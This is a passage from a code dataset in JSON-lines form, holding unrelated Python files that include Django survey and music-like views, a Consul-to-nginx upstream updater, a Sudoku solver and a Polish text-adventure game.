wrapper_runtime_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._wrapper_runtime_version\n\n @wrapper_runtime_version.setter\n def wrapper_runtime_version(self, wrapper_runtime_version):\n \"\"\"Sets the wrapper_runtime_version of this LogFlowDevice.\n\n Version of the wrapper technology framework (Xamarin runtime version or ReactNative or Cordova etc...). See wrapper_sdk_name to see if this version refers to Xamarin or ReactNative or other.\n # noqa: E501\n\n :param wrapper_runtime_version: The wrapper_runtime_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._wrapper_runtime_version = wrapper_runtime_version\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, LogFlowDevice):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"sdks/python/appcenter_sdk/models/LogFlowDevice.py","file_name":"LogFlowDevice.py","file_ext":"py","file_size_in_byte":25828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"485618364","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/dms/survey/utils.py\n\n.. enthaelt Hilfefunktionen fuer das E-Mail-Formular\n Django content Management System\n\nHans Rauch\nhans.rauch@gmx.net\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 17.01.2008 Beginn der Arbeit\n0.02 19.01.2008 get_admin_options\n\"\"\"\n\nimport string\nimport xml.dom.minidom\n\nfrom django.template.loader import get_template\nfrom django.template import Context\n\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import get_site_url\n\n# -----------------------------------------------------\ndef get_admin_options(item_container, user_perms):\n \"\"\" Personen mit manager-Rechten koennen bestimmte Optionen auswaehlen \"\"\"\n if not user_perms.perm_manage:\n return ''\n from django.template.loader import get_template\n from django.template import Context\n tSection = get_template('app/survey/admin_options.html')\n if item_container.item.integer_2:\n reset_option = False\n else:\n reset_option = True\n cSection = Context ({ 'path': get_site_url(item_container, ''), 'reset_option': reset_option})\n content = tSection.render ( cSection)\n return content\n\n# -----------------------------------------------------\ndef get_form_tab_row(item_container, user, user_org, inputs, texts):\n \"\"\" baut eine Eingabeelement zusammen \"\"\"\n input = text = ''\n for i in inputs:\n if i.question_id == item_container.item.id:\n if item_container.item.string_1 == 'checkbox':\n if input != '':\n input += '\\n'\n input += i.value\n else:\n input = i.value\n break\n for t in texts:\n if t.question_id == item_container.item.id:\n text = t.value\n\n if user.is_authenticated() and user_org != None:\n name = item_container.item.name[:-5] # .html abschneiden\n if name=='sex':\n if user.sex == _(u'm'):\n default = _(u'Herr')\n elif user.sex == _(u'w'):\n default = _(u'Frau')\n else:\n default = ''\n elif name=='first_name':\n default = user.first_name\n elif name=='last_name':\n default = user.last_name\n elif name=='title':\n default = user.title\n elif name=='email':\n default = user.email\n elif name=='username':\n default = user.username\n elif name=='organisation':\n default = user_org.organisation\n elif name=='sub_organisation':\n default = user_org.sub_organisation\n elif name=='street':\n default = user_org.street\n elif name=='zip':\n default = user_org.zip\n elif name=='town':\n default = user_org.town\n elif name=='phone':\n default = user_org.phone\n elif name=='fax':\n default = user_org.fax\n elif name=='homepage':\n default = user_org.homepage\n elif input != '':\n default = input\n elif text != '':\n default = text\n else:\n default = item_container.item.text_more\n else:\n default = item_container.item.text_more\n if item_container.item.string_1 == 'input':\n t_form = get_template('app/survey/input.html')\n context = Context ( { 'header': item_container.item.title,\n 'info': item_container.item.sub_title,\n 'maxlength': item_container.item.integer_2,\n 'size': item_container.item.integer_3,\n 'default': default,\n 'required': item_container.item.integer_1,\n 'name': item_container.item.id } )\n elif item_container.item.string_1 == 'text':\n t_form = get_template('app/survey/text.html')\n context = Context ( { 'header': item_container.item.title, \n 'info': item_container.item.sub_title,\n 'default': default,\n 'cols': item_container.item.integer_4,\n 'rows': item_container.item.integer_5,\n 'required': item_container.item.integer_1,\n 'name': item_container.item.id } )\n elif item_container.item.string_1 in ['radio', 'checkbox']:\n if item_container.item.string_1 == 'radio':\n t_form = get_template('app/survey/radio.html')\n else:\n t_form = get_template('app/survey/checkbox.html')\n keys = string.splitfields(item_container.item.text.strip().replace('

','').replace('

',''), '\\n')\n options = []\n defaults = string.splitfields(default, '\\n')\n for key in keys:\n key = key.strip()\n if key != '':\n if key in defaults:\n options.append( {'name': key, 'checked': True, } )\n else:\n options.append( {'name': key, } )\n context = Context ( { 'header': item_container.item.title,\n 'info': item_container.item.sub_title,\n 'options': options,\n 'required': item_container.item.integer_1,\n 'name': item_container.item.id } )\n return t_form.render(context)\n\n","sub_path":"survey/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"223783695","text":"#!/usr/bin python2.6.6\r\n# coding: utf-8\r\n'''\r\nAuthor : xiaoxuanzi (xiaoximou@gmail.com)\r\n\r\n'''\r\nimport urllib2\r\nimport sys\r\n\r\nimport config\r\nimport consul\r\nimport genlog\r\nlogger = genlog.Filelogger\r\n\r\nUPSTREAM_PREFIX = config.UPSTREAM_PREFIX\r\nSERVICE_PREFIX = config.SERVICE_PREFIX\r\nSERVICE = config.SERVICE\r\n\r\nclass UpdateNginxError( Exception ): pass\r\nclass UpdateNginx( object ):\r\n\r\n def __init__(self, ngx_name, upst_name, upst_info):\r\n\r\n self.ngx_name = ngx_name\r\n self.upst_name = upst_name\r\n self.upst_info = upst_info\r\n\r\n self.ips = config.NGINX[ngx_name]['ips']\r\n self.port = config.NGINX[ngx_name]['port']\r\n\r\n def _update(self, ip, port, data):\r\n\r\n uri = ''.join([\"http://\",ip,\":\",port,\"/upstream/\",self.upst_name])\r\n is_ok = False\r\n\r\n try:\r\n req = urllib2.Request(uri, data.encode('utf-8'))\r\n rep = urllib2.urlopen(req)\r\n ret = rep.read()\r\n ret = eval(ret)\r\n\r\n if ret['status'] == 200:\r\n is_ok = True\r\n\r\n except Exception as e:\r\n logger.warn(repr(e))\r\n is_ok = False\r\n\r\n return is_ok\r\n\r\n def update(self):\r\n\r\n port = str(self.port)\r\n tries = config.TRIES\r\n data = self.upst_info\r\n\r\n for ip in self.ips:\r\n msg = 'ip:{0} upstream:{1} nginx:{2}'.format(ip, self.upst_name, self.ngx_name)\r\n for i in xrange(0, tries):\r\n\r\n if self._update(ip, port, data):\r\n logger.info('UpdateNginx Success! {0}'.format(msg) )\r\n break\r\n else:\r\n logger.warn('UpdateNginx Failed! {0}'.format(msg))\r\n #raise UpdateNginxError(err_msg)\r\n\r\ndef run():\r\n\r\n try:\r\n key = sys.argv[1]\r\n c = consul.Consul()\r\n value = c.get(key)\r\n\r\n upst_name = key[len(UPSTREAM_PREFIX):]\r\n ngx_name = key[len(SERVICE_PREFIX):len(SERVICE_PREFIX) + len(SERVICE)]\r\n\r\n #print(upst_name, ' : ', ngx_name)\r\n ngx = UpdateNginx(ngx_name, upst_name, value)\r\n ngx.update()\r\n\r\n except Exception as e:\r\n logger.warn('ngx_name:{0} upst_name:{1} err:{2}'.format(ngx_name,upst_name,repr(e)))\r\n\r\nif __name__ == \"__main__\":\r\n\r\n run()\r\n","sub_path":"Python/Consul/ngx_consul.py","file_name":"ngx_consul.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"633359734","text":"# We want to define output format by ourselves by format() and string method\n\n# define __format__() in class\n\n_formats = {\n\t'ymd': '{d.year}-{d.month}-{d.day}',\n\t'mdy': '{d.month}/{d.day}/{d.year}',\n\t'dmy': '{d.day}/{d.month}/{d.year}'\n}\n\nclass Date:\n\tdef __init__(self, year, month, day):\n\t\tself.year = year\n\t\tself.month = month\n\t\tself.day = day\n\n\tdef __format__(self, code):\n\t\tif code == '':\n\t\t\tcode = 'ymd'\n\t\tfmt = _formats[code]\n\t\treturn fmt.format(d=self)\n\n# test\n\nd = Date(2016, 5, 18)\nprint (format(d))\nprint (format(d, 'mdy'))\nprint ('The date is {:ymd}'.format(d))\nprint ('The date is {:mdy}'.format(d))\n\n","sub_path":"8_class_object/2_define_string_output_format/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"273321579","text":"\nimport random\n\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\n\nfrom post.models import RecommendMusic, SearchMusic\n\nfrom drf_yasg.utils import swagger_auto_schema\n\nfrom .serializers import *\nfrom post.serializers import RecommandMusicSerializer, SearchMusicSerializer\n\n\nUser = get_user_model()\n\n\nclass UserDetailView(APIView):\n \n def get_object(self, user_id):\n return get_object_or_404(User, pk=user_id)\n \n def get(self, request, user_id):\n user = self.get_object(user_id)\n serializer = UserSerializer(instance=user)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def patch(self, request, user_id):\n user = self.get_object(user_id)\n serializer = UserSerializer(instance=user, data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def delete(self, request, user_id):\n user = self.get_object(user_id)\n user.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@swagger_auto_schema(methods=['post'], request_body=CheckEmailSerializer)\n@api_view(['POST'])\ndef check_email(request):\n email = request.data.get('email', None)\n exist = User.objects.filter(email=email).exists()\n if exist:\n state = status.HTTP_200_OK\n else:\n state = status.HTTP_204_NO_CONTENT\n \n return Response(status=state)\n\n\nclass MusicView(APIView):\n\n @swagger_auto_schema()\n def get(self, request):\n recommend_music = request.user.recommend_like.all()\n search_music = request.user.search_like.all()\n\n result = []\n\n recommend_music_serializer = LikeMusicSerializer(instance=recommend_music, many=True)\n search_music_serializer = LikeMusicSerializer(instance=search_music, many=True)\n \n for music in recommend_music_serializer.data:\n music = dict(music)\n music['liked'] = True\n result.append(music)\n \n for music in search_music_serializer.data:\n music = dict(music)\n music['liked'] = True\n result.append(music)\n\n random.shuffle(result)\n\n return Response(result, status=status.HTTP_200_OK)\n \n @swagger_auto_schema(request_body=LikeSerializer)\n def post(self, request):\n pk = request.data['music_id']\n search = request.data['search']\n \n if search:\n music = get_object_or_404(SearchMusic, pk=pk)\n\n if request.user in music.search_like_music.all():\n music.search_like_music.remove(request.user)\n msg = {\n 'detail' : '좋아요 취소' \n }\n return Response(msg, status=status.HTTP_200_OK)\n else:\n music.search_like_music.add(request.user)\n msg = {\n 'detail' : '좋아요' \n }\n return Response(msg, status=status.HTTP_200_OK)\n else:\n music = get_object_or_404(RecommendMusic, pk=pk)\n if request.user in music.recommend_like_music.all():\n music.recommend_like_music.remove(request.user)\n msg = {\n 'detail' : '좋아요 취소' \n }\n return Response(msg, status=status.HTTP_200_OK)\n else:\n music.recommend_like_music.add(request.user)\n msg = {\n 'detail' : '좋아요' \n }\n return Response(msg, status=status.HTTP_200_OK)\n\n@swagger_auto_schema()\n@api_view(['GET'])\ndef my_music(request):\n posts = request.user.posts.all()\n search_music = SearchMusic.objects.filter(user=request.user).all()\n\n result = []\n for post in posts:\n music= post.recommend_music\n if music:\n music_data = RecommandMusicSerializer(instance=music).data\n music_data['liked'] = request.user.recommend_like.filter(pk=music.id).exists()\n result.append(music_data)\n \n for music in search_music:\n music_data = SearchMusicSerializer(instance=music).data\n music_data['liked'] = request.user.search_like.filter(video_id=music.video_id).exists()\n result.append(music_data)\n \n return Response(result, status=status.HTTP_200_OK)\n","sub_path":"back/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"317151669","text":"#Program to Solve Sudoku\r\n#Display\r\ndef Display(set):\r\n for i in set:\r\n if i == set[0]:\r\n print(\"-\"*19)\r\n rec = \"\"\r\n rec = \"|\" + \"|\".join(map(str,i)) + \"|\"\r\n print(rec)\r\n if i == set[-1]:\r\n print(\"-\"*19)\r\n if i == set[2]:\r\n print(\"-\"*19)\r\n if i == set[5]:\r\n print(\"-\"*19)\r\n#Checking Row\r\ndef RowCheck(set,row,blocked):\r\n for i in range(1,10):\r\n if i not in blocked and i in set[row]:\r\n blocked.append(i)\r\n return blocked\r\n#Checking Column\r\ndef ColumnCheck(set,column,blocked):\r\n for i in range(1,10):\r\n for j in range(0,9):\r\n if i not in blocked and i == set[j][column]:\r\n blocked.append(i)\r\n return blocked\r\n#Parameter Set\r\ndef Parameter(column,row):\r\n if column >= 0 and column < 3:\r\n if row >= 0 and row < 3:\r\n return [[0,3],[0,3]]\r\n elif row >= 3 and row < 6:\r\n return [[0,3],[3,6]]\r\n elif row >= 6 and row < 9:\r\n return [[0,3],[6,9]]\r\n elif column >= 3 and column < 6:\r\n if row >= 0 and row < 3:\r\n return [[3,6],[0,3]]\r\n elif row >= 3 and row < 6:\r\n return [[3,6],[3,6]]\r\n elif row >= 6 and row < 9:\r\n return [[3,6],[6,9]]\r\n elif column >= 6 and column < 9:\r\n if row >= 0 and row < 3:\r\n return [[6,9],[0,3]]\r\n elif row >= 3 and row < 6:\r\n return [[6,9],[3,6]]\r\n elif row >= 6 and row < 9:\r\n return [[6,9],[6,9]]\r\n#Block Check\r\ndef BlockCheck(set,column,row,blocked):\r\n param = Parameter(column,row)\r\n columnparam = param[0]\r\n rowparam = param[1]\r\n for k in range(1,10):\r\n for i in range(rowparam[0],rowparam[1]):\r\n for j in range(columnparam[0],columnparam[1]):\r\n if k not in blocked and k==set[i][j]:\r\n blocked.append(k)\r\n return blocked\r\n#Setting in per block\r\ndef PerBlock(set):\r\n for i in range(0,9):\r\n for j in range(0,9):\r\n if set[i][j] == 0:\r\n possible = []\r\n blocked = []\r\n blocked = RowCheck(set,i,blocked)\r\n blocked = ColumnCheck(set,j,blocked)\r\n blocked = BlockCheck(set,j,i,blocked)\r\n for k in range(1,10):\r\n if k not in blocked:\r\n possible.append(k)\r\n if len(possible) == 1:\r\n set[i][j] = possible[0]\r\n return set\r\n#Getting Sudoku from User\r\ndef GetSudoku():\r\n infoset = [[1,2,3,4,5,6,7,8,9],[10,11,12,13,14,15,16,17,18],[19,20,21,22,23,24,25,26,27],[28,29,30,31,32,33,34,35,36],[37,38,39,40,41,42,43,44,45],[46,47,48,49,50,51,52,53,54],[55,56,57,58,59,60,61,62,63],[64,65,66,67,68,69,70,71,72],[73,74,75,76,77,78,79,80,81]]\r\n print(\"Please Enter prompts as the given order:\")\r\n Display(infoset)\r\n set = [[],[],[],[],[],[],[],[],[]]\r\n n=1\r\n for i in range(0,9):\r\n for j in range(0,9):\r\n element = int(input(f\"Enter {n}:\"))\r\n set[i].append(element)\r\n n+=1\r\n return set\r\n#Function to Solve the Sudoku\r\ndef Solver(choice):\r\n if choice:\r\n set1 = [[5,3,0,0,7,0,0,0,0],[6,0,0,1,9,5,0,0,0],[0,9,8,0,0,0,0,6,0],[8,0,0,0,6,0,0,0,3],[4,0,0,8,0,3,0,0,1],[7,0,0,0,2,0,0,0,6],[0,6,0,0,0,0,2,8,0],[0,0,0,4,1,9,0,0,5],\r\n[0,0,0,0,8,0,0,7,9]]\r\n else:\r\n set1 = GetSudoku()\r\n set2 = set1\r\n print(\"Original\")\r\n Display(set1)\r\n Unfinished = True\r\n while Unfinished:\r\n set2 = PerBlock(set2)\r\n n = 0\r\n for i in set2:\r\n if 0 in i:\r\n n+=1\r\n if n == 0:\r\n Unfinished = False\r\n print(\"Solved\")\r\n Display(set2)\r\n#Function to debug the checking functions\r\ndef FunctionTest():\r\n blockt = [[0,2,3,4,5,6,7,8,9],[4,5,6],[7,8,9],[2],[3],[5],[6],[8],[9]]\r\n print(\"Original\")\r\n Display(blockt)\r\n possible = []\r\n blocked = []\r\n blocked = ColumnCheck(blockt,0,blocked)\r\n blocked = RowCheck(blockt,0,blocked)\r\n blocked = BlockCheck(blockt,0,0,blocked)\r\n for i in range(1,10):\r\n if i not in blocked:\r\n possible.append(i)\r\n if len(possible) == 1:\r\n blockt[0][0] = possible[0]\r\n print(\"Solved\")\r\n Display(blockt)\r\n print(possible)\r\n print(blocked)\r\n\r\n#Main Program\r\nchoiceTF = True\r\nwhile choiceTF:\r\n choice = input(\"Do you want to input your own Sudoku?(Y/N):\")\r\n if choice.upper() == \"Y\":\r\n choiceTF = False\r\n n = False\r\n elif choice.upper() == \"N\":\r\n n = True\r\n choiceTF = False\r\n else:\r\n print(\"Please enter a valid choice\")\r\n\r\nSolver(n)\r\n","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"319572899","text":"# -*- coding: utf-8 -*- \nimport sys \nimport json\nimport time\nimport os\nimport random\n#import lokacje\nfrom wincon import *\n\n#west = lokacje.west()\n\n# Wypisywacz tekstów\n\ndef printtekst(lib1):\n for x in lib1:\n print(x, end=\"\", flush=True)\n time.sleep(0.02)\n \ndef printtekstslow(lib1):\n for x in lib1:\n print(x, end=\"\", flush=True)\n time.sleep(0.03) \n \ndef printsay(ar1):\n set_color(BLUE)\n print(ar1, end=\"\")\n set_color(LIGHT|RED)\n print(\" mówi: \")\n set_color(None)\n\ndef menu(opcje, text):\n printtekst(text)\n while True:\n abc = sys.stdin.readline().strip()\n if abc in opcje:\n return abc\n text12 = \"hmm, coś wpisałeś nie tak.\\n\"\n printtekst(text12)\n\ndef printlok(arg1, arg2):\n set_color(GRAY)\n print(\"===============================================================================\")\n set_color(GREEN)\n print(\" Lokalizacja: %s | %s \" % (arg1, arg2))\n set_color(GRAY)\n print(\"===============================================================================\\n\")\n set_color(None)\n \ndef printopis(arg1):\n set_color(GRAY)\n print(\"===============================================================================\")\n set_color(GREEN)\n print(\" %s \" % (arg1))\n set_color(GRAY)\n print(\"===============================================================================\\n\")\n set_color(None) \n \ndef printcore(arg1):\n set_color(GRAY)\n print(\"===============================================================================\")\n set_color(GREEN)\n print(\" Lokalizacja: %s \" % (arg1))\n set_color(GRAY)\n print(\"===============================================================================\\n\")\n set_color(None) \n \n \n# Kolory dla linuxa i windowsa\ndef sleep(): \n time.sleep(0.25) \n \nif os.name == 'nt':\n import ctypes\n import struct\n RED, GREEN, BLUE = 4, 2, 1\nelse:\n RED, GREEN, BLUE = 1, 2, 4\n\nLIGHT = 8\nBROWN = RED | GREEN\nCYAN = BLUE | GREEN\nMAGENTA = RED | BLUE\nBLACK = 0\nGRAY = RED | GREEN | BLUE\n# set_color(GRAY|LIGHT) set_color(BLUE|LIGHT) set_color(BLUE) set_color(None) \n\ndef set_color(c):\n if os.name == 'nt':\n set_color_nt(c)\n elif os.name == 'posix':\n set_color_posix(c)\n\ndef set_color_posix(c):\n # http://www.xfree86.org/4.8.0/ctlseqs.html\n # https://en.wikipedia.org/wiki/ANSI_escape_code#Colors\n\n if c is None:\n # Reset koloru do domyślnego.\n sys.stdout.write(\"\\x1b[;m\")\n return\n\n intensity = 0\n if c & LIGHT:\n intensity = 1\n\n color = 30 + (c & 7)\n\n sys.stdout.write(\"\\x1b[%u;%um\" % (intensity, color))\n \n\ndef set_color_nt(c):\n # Upewnij się, że wszystko do tej pory zapisane do stdout zostało już\n # przekazane do konsoli.\n sys.stdout.flush()\n\n # Pobierz systemowy uchwyt standardowego wyjścia konsoli. \n hstdout = getattr(set_color_nt, \"hstdout\", None)\n if hstdout is None:\n STD_OUTPUT_HANDLE = 0xfffffff5\n hstdout = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)\n setattr(set_color_nt, \"hstdout\", hstdout)\n\n # Pobierz obecny kolor, który będzie uznany za domyślny.\n console_info = ctypes.create_string_buffer(22)\n ctypes.windll.kernel32.GetConsoleScreenBufferInfo(\n hstdout, ctypes.byref(console_info))\n default_color = struct.unpack(\"h\", console_info[8:10])[0]\n setattr(set_color_nt, \"default_color\", default_color)\n\n # Zmień kolor.\n if c is None:\n c = getattr(set_color_nt, \"default_color\", GRAY)\n\n ctypes.windll.kernel32.SetConsoleTextAttribute(hstdout, c)\n\n# nick w grze\nwith open(\"data.json\", \"r\") as f:\n nick = json.loads(f.read())\n\n# Pierwszy kontakt z grą\ndef firststart():\n global nick \n if nick == \"\": \n print(\"Witaj! Widocznie odpaliłes pierwszy raz gre! Podaj nam swoj nick\") \n nick = sys.stdin.readline().strip() \n print(\"Od teraz twojim nickiem w grze będzi %s !\" % nick)\n else:\n start() \n \n\n \n\n# Zapis gry\nsave = {\n\"karczmasave\":1,\n\"ryneksave\":0,\n\"kowalsave\":0,\n\"zielarzsave\":0,\n\"katedrasave\":0\n}\n \n# Zmienne globalne\nlokalizacja = \"Sauron\"\n\n\n# Mapa\n\ndef mapa():\n print(\"Mapa Miasta \")\n \n\n\n# Lokalizacje w Dennergrave\n\nclass LocDKarczma:\n def showlocation(self):\n karczma()\n return False\n \n def core(self, cmd):\n pass\n \ndef karczma():\n cls()\n global save \n printlok(\"Dennergrave\", \"Karczma\")\n if save[\"karczmasave\"] == 0:\n printsay(\"Karczmarz\")\n text = \"Witaj! Jestem tutaj Karczmarzem, widzę Cię tu pierwszy raz więc postanowiłem \\nzapytać czy nie potrzebujesz małej pomocy w oprowadzeniu Cię po karczmie.\\n\\n1.)Witaj. Przyda mi się pare słów o tym miejscu\\n2.)Cześć. Nie dziękuje poradzę sobie.\\n\"\n printtekst(text)\n while True:\n kst = sys.stdin.readline().strip()\n if kst == \"1\": \n print(\"Witaj, z mila checia zobacze co tu sie dzieje\")\n text99 = \"Tak więc w Karczmie możesz grać z tutejszymi mieszczanami w gry o pieniądze, \\njest to łatwy sposób na zarobienie lecz można też wszystko szybko stracić. Tak \\nwięc graj rozsądnie\\n\"\n printsay(\"Karczmarz\")\n printtekst(text99)\n break \n if kst == \"2\": \n break \n else:\n print(\"Hmm coś się nie zgadza..\") \n askone = menu([\"1\",\"2\",\"3\"], \"Gdzie chcesz podejść?\\n1.)Bar (Karczmarz)\\n2.)Stolik z grą w kości\\n3.)Wyjdz\\n\")\n cls()\n printlok(\"Dennergrave\", \"Karczma\")\n if askone == \"2\":\n printsay(\"Mieszczanin\") \n textm2 = \"Witaj wojowniku! Chętny na partyjkę w kości?\\n1.)Tak\\n2.)Nie\\n\"\n printtekst(textm2)\n askkarczma1 = sys.stdin.readline().strip()\n while True: \n if askkarczma1 == \"1\":\n while True:\n text3 = \"Okej, jeżeli będziesz gotowy wpisz losuj i zaczniemy grę. Za każdą wygraną \\ndostaniesz 10 monet\\n\"\n printsay(\"Mieszczanin\")\n printtekst(text3)\n ask4 = sys.stdin.readline().strip()\n if ask4 == \"losuj\":\n mrandom = random.randint(1, 6)\n hrandom = random.randint(1, 6)\n if mrandom > hrandom:\n print(\"Wynik Mieszczanina = %d \\nMój wynik = %d\" % (mrandom, hrandom))\n text5 = \"Niesty przegrywasz\\n\"\n printtekst(text5)\n elif mrandom < hrandom:\n print(\"Wynik Mieszczanina = %d \\nMój wynik = %d\" % (mrandom, hrandom))\n text6 = \"Tym razem udało Ci się wygrać\\n\"\n printtekst(text6) \n elif mrandom == hrandom:\n print(\"Wynik Mieszczanina = %d \\nMój wynik = %d\" % (mrandom, hrandom))\n text7 = \"Remis!\\n\"\n printtekst(text7)\n printsay(\"Mieszczanin\")\n text8 = \"Gramy dalej? (tak, nie)\\n\"\n printtekst(text8)\n ask8 = sys.stdin.readline().strip()\n if ask8 == \"nie\":\n cls()\n return \n if askkarczma1 == \"2\":\n cls()\n return\n else: \n print(\"hmm?\")\n if askone == \"1\":\n print(\"\")\n if askone == \"3\":\n cls()\n move(LocDMiasto)\n \nclass LocDMiasto:\n def __init__(self):\n self.commands_d = {\n \"karczma\":LocDKarczma,\n \"rynek\":LocDRynek,\n }\n def showlocation(self):\n cls()\n printcore(\"Dennergrave\") \n \n def core(self, cmd):\n if cmd in self.commands_d:\n move(self.commands_d[cmd])\n return True\n return False\n \nclass LocDRynek:\n def __init__(self):\n self.MENU = {\n \"1\":LocDKarczma,\n \"2\":LocDRynek,\n \"3\":LocDRynek,\n \"4\":LocDRynek,\n \"5\":LocDRynek\n } \n def showlocation(self):\n global save\n cls()\n printlok(\"Dennergrave\", \"Rynk\")\n printtekst(\"Gdzie chcesz podejść?\\n1.)Miastowy Kupiec\\n2.)Stojisko z bronią\\n3.)Mieszczanin Lothius \\n4.)Podestał\\n5.)Wróc do Miasta\\n\")\n \n def core(self, cmd): \n if cmd not in self.MENU:\n return False\n move(self.MENU[cmd])\n return True\n \n \ndef kowal():\n cls()\n global save\n printlok(\"Dennergrave\", \"Kowal\")\n if save[\"kowalsave\"] == 0:\n text = \"\"\n printtekst(text)\n \ndef zielarz():\n cls() \n printlok(\"Dennergrave\", \"Zielarz\")\n if save[\"zielarzsave\"] == 0:\n text = \"\"\n printtekst(text)\n \ndef katedra():\n cls()\n printlok(\"Dennergrave\", \"Katedra\")\n if save[\"katedra\"] == 0:\n text = \"\"\n printtekst(text)\n \n \n \n \n \n# Komendy\ndef ekwipunek():\n test = \"testowy item\"\n cls()\n printopis(\"Ekwipunek\") \n print(\" Wyposażenie \\u2551 Ekwipunek \")\n print(\" \\u2551 \")\n print(\" Broń: %-30s\\u2551 %-31s\" % (test, test))\n print(\" Pierścień: %-25s\\u2551 %-31s\" % (test, test))\n print(\" \\u2551 %-31s\" % test)\n print(\" Hełm: %-30s\\u2551 %-31s\" % (test, test))\n print(\" Zbroja: %-28s\\u2551 %-31s\" % (test, test))\n print(\" Spodnie: %-27s\\u2551 %-31s\" % (test, test))\n print(\" Buty: %-30s\\u2551 %-31s\" % (test, test))\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n \n\ndef questy():\n print(\"Questy\")\n dcore() \n\ndef info():\n print(\"Lokalizacja : %s\" % lokalizacja)\n dcore2()\n \n\n \n \n# User Pofil \n# ZAPISYWANIE AKUTALNEGO EXPA! \n\nexp = 145\n\nhp = 0 \nmaxhp = 0\nattack = 0 \nmagicpower = 0 \narmor = 0 \nmagicresist = 0\n\nl_hp = 0 \nl_maxhp = 0\nl_attack = 0 \nl_magicpower = 0 \nl_armor = 0 \nl_magicresist = 0\n\nclass lvlsystem:\n global hp\n global maxhp\n global attack\n global magicpower\n global armor\n global magicresist \n\n #LVL system\n\n def lvlcheck(self):\n if exp <= 200:\n instancja.lvl = \"2\"\n self.lvl2() \n if exp <= 100:\n instancja.lvl = \"1\"\n self.lvl1() \n \n def lvl1(self):\n global l_maxhp, l_attack, l_armor, l_magicpower, l_magicresist\n l_maxhp = 10\n l_attack = 3 \n l_armor = 0\n l_magicpower = 0 \n l_magicresist = 0 \n \n def lvl2(self):\n global l_maxhp, l_attack, l_armor, l_magicpower, l_magicresist\n l_maxhp = 12\n l_attack = 4 \n l_armor = 0\n l_magicpower = 0 \n l_magicresist = 0 \n\nlvl = lvlsystem()\n\n# !!! Zapis aktualnej klasy + Aktualnych broni\nklasaitem = {\n\"Wojownik_saver\":\"0\",\n\"Berserker_saver\":\"0\",\n\"Mag_saver\":\"0\", \n\"Kapłan_saver\":\"0\",\n\"Łowca_saver\":\"0\"\n}\n\nclass actualitem:\n a_weapon = 0 # Atak aktualnej broni\n a_magicweapon = 0 # Atak magiczny aktualnej broni, czyli Magic Power\n a_armor = 0 # Armor dla Zbroji \n a_armor_mr = 0 # Magic Resist dla Zbroji \n a_armor_hp = 0 # Dodatkowe hp dla zbroji\n a_ring_mp = 0 # Magic Power dla ringa\n a_ring_mr = 0 # Magic Resist dla ringa\n a_ring_hp = 0 # Dodatkowe hp dla ringa\n a_helmet = 0 # Armor dla hełmu\n a_helmet_mr = 0 # Magic Resist dla hełmu\n a_legs = 0 # Armor dla spodni\n a_legs_mr = 0 # Magic Resist dla spodni\n a_boots = 0 # Armor dla bótów\n \naitem = actualitem()\n\nclass ItemInterface():\n Name = \"\"\n Type = \"\"\n def equip(self, hero):\n pass\n\n def unequip(self, hero):\n pass\n\n def info(self):\n pass\n \nclass Dlugi_Miecz(ItemInterface):\n Id = \"Id1\"\n Name = \"Długi Miecz\"\n Type = \"Miecz\"\n Attack = 3\n def equip(self, hero):\n aitem.a_weapon += 3\n \n def unequip(self, hero):\n aitem.a_weapon -= 3\n\n def info(self):\n cls()\n printlok(\"Opis przedmiotu:\",\"Długi Miecz (%s)\" % self.Id)\n print(\"Typ: %s\\nAttack: %d\" % (self.Type, self.Attack))\n\nid1 = Dlugi_Miecz()\n \n \n \n#\n# Drzewko umiejętności:\n#\n\n\nclass SkillsTree:\n def show(self):\n if 